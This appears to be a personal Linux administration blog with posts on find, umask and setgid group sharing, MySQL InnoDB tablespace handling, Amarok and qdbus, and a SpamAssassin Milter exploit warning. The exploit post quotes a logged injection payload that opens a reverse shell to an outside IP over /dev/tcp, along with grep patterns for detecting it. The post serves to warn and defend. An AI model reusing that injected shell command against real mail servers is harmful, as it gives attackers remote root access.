Monday, June 27, 2011

Performing more than one search in one pass of 'find'

find is a utility that searches a directory tree for files matching complex conditions. The conditions may include file name, file type, access/modification/status-change times, owner, permissions and so on. In addition, you can define an action to be performed on the files that match your search criteria.

When I have to run several searches, I usually do it sequentially, but this can take far too long when find has to inspect a very large number of files. It turns out that you can define multiple sets of conditions in a single find invocation and perform a different action on the files matching each set, while the utility traverses the directory tree only once.

This is how you can define multiple conditions and actions in one pass of find:

find /data \( ! -group mygroup -exec chgrp mygroup {} \; \) , \
           \( -type f ! -perm -g=rw -exec chmod g+rw {} \; \) , \
           \( -type d ! -perm -g=rws -exec chmod g+rws {} \; \)

This command will change the owning group of every file that does not belong to mygroup, grant the group read and write permissions on regular files, and grant read, write and setgid permissions (g+rws) on directories. All in a single pass.
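For comparison, the same work done the usual sequential way walks /data three times instead of once:

find /data ! -group mygroup -exec chgrp mygroup {} \;
find /data -type f ! -perm -g=rw -exec chmod g+rw {} \;
find /data -type d ! -perm -g=rws -exec chmod g+rws {} \;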

Wednesday, April 20, 2011

How to change default `umask' in Linux. File permissions for collaborative environment

Umask is a command and a value that defines what permissions newly created files and directories will have. Had it not been for umask, every file you create would have permissions 666 (u=rw,g=rw,o=rw), and every directory 777 (u=rwx,g=rwx,o=rwx). But the bits set in umask are masked out of these base permissions (for the usual values this looks like simple subtraction), and the result is used as the permissions for the new file. Usually, the default umask is 022, which leaves us with 644 (the owner can read and write, everyone else can only read). The value of umask may differ from user to user; it is set with the command of the same name (search for 'umask' in `man bash`).
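A quick illustration in a shell (the file names are arbitrary):

$ umask 022
$ touch file1; ls -l file1    # -rw-r--r-- : 666 with 022 masked out gives 644
$ umask 002
$ touch file2; ls -l file2    # -rw-rw-r-- : 666 with 002 masked out gives 664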

Frankly, I find the choice of the default value for umask rather strange. Suppose you have a server where five people with their own accounts work on a web application, and the code is stored in a version control system. All five need sufficient permissions on the checked-out code. But when one of them adds a new file to the repository and then checks it out, the file belongs to that user and cannot be modified by the others. Possible solutions are either to grant write permissions to everyone (chmod 666 filename) or to change the group ownership of the file to some group all five developers belong to and grant write permissions to that group. The first solution is insecure. As for the second, a simple trick lets us maintain group ownership of all files in the project.

Among the various permission bits you can set with chmod there is one called setgid. When this bit is set on a directory, all files and directories created inside it inherit its group ownership. So we only have to grant write permissions to the owning group in order to collaborate with other users. To have the necessary permissions granted automatically, we can set the umask value to 002. This is done with the simple command 'umask 002', but is there a way to make it the default for all users?
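By the way, you can watch the setgid trick at work with a couple of commands (directory and group names are made up):

$ mkdir /tmp/shared && chgrp team /tmp/shared && chmod g+s /tmp/shared
$ touch /tmp/shared/file
$ ls -l /tmp/shared/file    # group is 'team', not the creator's primary group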

Umask may be modified in /etc/profile. For example, in Ubuntu Linux, this file contains the following line:

umask 022

By changing the value to 002, we change the umask for all users who log in through shells that source /etc/profile. Watch out, though: there are situations when this file is not read at all. For example, cron executes all commands with the default umask 022. How do we tackle this problem?

Another way to change umask is PAM (Pluggable Authentication Modules), the subsystem for adding various features to the login process. One of its modules, pam_umask, allows setting a default umask for all users. We have to enable this module for both interactive and non-interactive sessions. In Ubuntu, PAM configuration files live in /etc/pam.d. Make sure the pam_umask module is installed (package libpam-modules) and edit two files, common-session and common-session-noninteractive, adding one line at the end of each:

session optional pam_umask.so umask=002

NB! If I understand correctly, you also have to run pam-auth-update so that PAM rereads the configuration.
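To check that the module took effect, open a fresh login session and print the umask; a sketch assuming sshd is running locally (with UsePAM enabled) and a user1 account exists:

$ ssh user1@localhost umask    # a fresh session; should print 0002 after the change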

CAVEAT 1: umask may be set in users' ~/.profile, so make sure it is not!

CAVEAT 2: There are some especially badly written programs that have umask hardcoded. Gnome is notorious for having such bugs (e.g., see bug #336214). My advice would be: do NOT use GDM or Nautilus. Or Gnome, or KDE, for that matter :).

So, to sum it up. To set up a collaborative environment, we have to:

  1. create a new group: addgroup team
  2. add users to this group: adduser user1 team
  3. create a new directory: mkdir /var/www/project
  4. change group ownership for the directory: chgrp team /var/www/project
  5. change the permissions for the directory: chmod g+sw /var/www/project
  6. edit the PAM config files, adding pam_umask.so with umask=002.

Now, every file that user1 creates in /var/www/project will be writable by everyone in the team.
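A quick way to verify the whole setup, assuming a second member, user2, was added to the group the same way as user1:

$ su - user1 -c 'touch /var/www/project/test.php'
$ ls -l /var/www/project/test.php    # -rw-rw-r-- user1 team: group-writable
$ su - user2 -c 'echo ok >> /var/www/project/test.php'    # succeeds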

Pardon me for repeating myself, but I do find the default value of umask unreasonable. 022 is usually justified by security concerns, yet it denies group members the right to edit a file while granting read access to everyone! I could understand, say, 027, which bans read access for those outside the group, or 002, which grants write access to the group. Perhaps 007 would be a good compromise.

Monday, February 14, 2011

Vulnerability in Spamassassin milter plugin

Owners of sendmail/postfix with the Spamassassin Milter plugin, watch out! An exploit is in the wild:
Spamassassin Milter Plugin Remote Root,
SpamAssassin Milter Plugin 'mlfi_envrcpt()' Remote Arbitrary Command Injection Vulnerability,
ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt.

Check your logs for mail like this:

Feb 13 20:31:55 host sm-mta[21734]: p1DHVtxv021734: from=blue@dick.com, size=0, class=0, nrcpts=0, proto=SMTP, daemon=MTA-v4, relay=eluxenia.com [62.149.195.3]

If the system is not vulnerable, sendmail would reply with:

Feb 13 20:31:55 host sm-mta[21734]: p1DHVtxv021734: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"... Cannot mail directly to programs

At least, this is what my sendmail reported.
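To scan for such attempts in bulk, something along these lines should do (the log path is Ubuntu's default; adjust to your syslog configuration):

$ grep 'Cannot mail directly to programs' /var/log/mail.log
$ grep '/dev/tcp/' /var/log/mail.log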

Monday, December 20, 2010

SOLVED: Moving InnoDB tables between Percona MySQL servers

Update. Warning: the procedure does not work. The table can be copied, imported into another server and read successfully, but an attempt to write to the table crashes the server. The problem is probably caused by stale tablespace ids left in the ibd file.

Update 2. Kudos to the Percona team, who pointed me to an error in my configuration file. To import tablespaces, one more option has to be set on the destination server: innodb_expand_import. The Xtrabackup documentation has been updated.

While trying to move a table from one server to another, I ran into a problem. I followed the procedure outlined in the Percona Xtrabackup manual, chapter Exporting Tables.
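For context, here is a rough sketch of that procedure as I understood it; the paths are illustrative, not copied from the manual:

# on the source server: take a backup and prepare it with --export
$ xtrabackup --backup --target-dir=/backup
$ xtrabackup --prepare --export --target-dir=/backup
# on the destination server (innodb_file_per_table enabled; the table must
# already exist there with the same definition):
$ mysql -e 'ALTER TABLE dbx_replica.document_entity_bodies DISCARD TABLESPACE'
$ cp /backup/dbx_replica/document_entity_bodies.ibd /var/lib/mysql/dbx_replica/
$ cp /backup/dbx_replica/document_entity_bodies.exp /var/lib/mysql/dbx_replica/
$ mysql -e 'ALTER TABLE dbx_replica.document_entity_bodies IMPORT TABLESPACE'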

On the last step, when doing IMPORT TABLESPACE, I received an error message saying:

mysql> alter table `document_entity_bodies` import tablespace;
ERROR 1030 (HY000): Got error -1 from storage engine

There was some more information in the log:

101220 16:14:51  InnoDB: Error: tablespace id and flags in file './dbx_replica/document_entity_bodies.ibd'
 are 21 and 0, but in the InnoDB
InnoDB: data dictionary they are 181 and 0.
InnoDB: Have you moved InnoDB .ibd files around without using the
InnoDB: commands DISCARD TABLESPACE and IMPORT TABLESPACE?
InnoDB: Please refer to
InnoDB: http://dev.mysql.com/doc/refman/5.1/en/innodb-troubleshooting-datadict.html
InnoDB: for how to resolve the issue.
101220 16:14:51  InnoDB: cannot find or open in the database directory the .ibd file of
InnoDB: table `dbx_replica`.`document_entity_bodies`
InnoDB: in ALTER TABLE ... IMPORT TABLESPACE

The page mentioned in the log was not really helpful. What saved me was this article: Recovering an InnoDB table from only an .ibd file.

Following the instructions, I used a hex editor (shed) to change the tablespace id in the ibd file from 0x15 to 0xB5 (21 to 181), and then the import worked fine.
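For a non-interactive equivalent of the hex editing, something like this should work; the sketch assumes the space id is stored big-endian in page 0, in the FIL header at byte offset 34 and again in the FSP header at offset 38, so verify with a hex dump first (and, per the update above, this whole manipulation turns out to be unnecessary once innodb_expand_import is set):

$ xxd -l 48 document_entity_bodies.ibd    # look for the 00 00 00 15 words
$ printf '\x00\x00\x00\xb5' | dd of=document_entity_bodies.ibd bs=1 seek=34 count=4 conv=notrunc
$ printf '\x00\x00\x00\xb5' | dd of=document_entity_bodies.ibd bs=1 seek=38 count=4 conv=notrunc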

I wonder if there is a way to avoid these manipulations. Perhaps, one more operation should be added to xtrabackup to make the tablespace ids agree?

Oh, and it's Xtrabackup 1.4 working with Percona Server 5.1.51.

Wednesday, December 15, 2010

Amarok without panels and trays

What's the use of “desktop” ornamentation like panels and trays? Time of day, CPU load, WiFi status — I can't think of anything I'd want to see every moment I spend at the keyboard. If I want to know what time it is, I press 'M-z a'. So panels and trays do not occupy a single pixel of my display.

Some programs, though, have a strange habit of closing their main window and leaving only a small icon in the tray, with no way to control them other than grabbing the mouse and clicking, clicking, clicking... In some cases, though, you can leave your mouse in the dust. Amarok is one such case. I was perplexed to see Amarok in the list of processes while its main window was nowhere to be found. Unfortunately, Amarok uses one of those recent abominations that appeared in Linux: DBus. To show the main window, send it a message using `qdbus':

$ qdbus org.kde.amarok /amarok/MainWindow org.kde.amarok.MainWindow.showHide

Friday, November 19, 2010

MySQL: enable innodb_file_per_table with zero downtime

I thought that while my wife is preoccupied with the lemon pie, I might tell you this story.

InnoDB is a very good storage engine for MySQL that combines reasonable performance with wide popularity and, as a consequence, a good set of tools for diagnostics and fine-tuning. One of its downsides is inefficient disk space management: once an extent of disk space has been added to the shared tablespace, InnoDB will not give it back, even if you delete tables or whole databases. To add some flexibility, you should use the innodb_file_per_table option. Unfortunately, you cannot simply enable this option on a running database. You have to dump the database and restore it on a new instance of MySQL that has the option enabled from the very beginning. This scenario means the database is inaccessible from the moment you start mysqldump to the moment you finish restoring the data on the new instance. Is there a way to minimize the downtime?

Yes, you can run mysqldump on a backup of your database. But then you lose the data written between the moment you take the backup and the moment the new instance is ready. Still, that's a step closer to the solution: you can also set up replication between the original database and the new one, and when the new instance catches up with the old one, your task is complete. And the backup can be done online, without stopping MySQL, using the Xtrabackup tool by Percona.
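For the record, the only configuration change the new instance needs is the option itself; on Ubuntu it could go into a drop-in file like this (the directory is the distro convention, the file name is made up):

$ sudo tee /etc/mysql/conf.d/file_per_table.cnf <<'EOF'
[mysqld]
innodb_file_per_table
EOF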

So, the basic steps you have to follow are:

  • Configure your original database as a master. Unless it is already writing binary logs, this is the only step that requires restarting MySQL.
  • Make a backup of the original database using Xtrabackup.
  • Restore the backup and run a second instance of MySQL.
  • Run mysqldump on the second instance.
  • Stop the second instance, but do not delete it yet.
  • Create a new database and start the third instance of MySQL with innodb_file_per_table enabled.
  • Restore the dump by feeding it into the third instance of MySQL.
  • Configure the third instance as a slave and start the replication (see the sketch after this list).
  • When the initial replication finishes and the slave catches up with the master, reconfigure your clients to use the new instance.
  • That's it. You can stop the first instance now and delete it.
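Here is a sketch of the replication step; the host, credentials, port and binlog coordinates are illustrative — take the real ones from the xtrabackup_binlog_info file saved with the backup:

$ cat /backup/xtrabackup_binlog_info
mysql-bin.000003        1447
$ mysql -h 127.0.0.1 -P 3308 -e "CHANGE MASTER TO MASTER_HOST='master.example.com',
      MASTER_USER='repl', MASTER_PASSWORD='secret',
      MASTER_LOG_FILE='mysql-bin.000003', MASTER_LOG_POS=1447; START SLAVE;"
$ mysql -h 127.0.0.1 -P 3308 -e 'SHOW SLAVE STATUS\G' | grep Seconds_Behind_Master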

I wrote an even more detailed guide, illustrated with example commands. It was published on Linux.com recently: HOWTO: Reconfigure MySQL to use innodb_file_per_table with zero downtime.

Friday, November 12, 2010

How not to write scripts

Today I saw a PHP script that used 41.5 GB of virtual memory, 26 of them carefully tucked away in swap. And I recalled the programs we were writing only 15-20 years ago. Like a text editor that could process gigabyte text files (in theory, because there were no disk drives to store such files on). Or a graphics viewer that could show pictures ten times larger than the available RAM.

As a friend of mine put it: in the USSR, when engineers were sent to a kolkhoz to harvest potatoes, they knew what would happen to them if they didn't work well. I wish some modern developers knew that, too.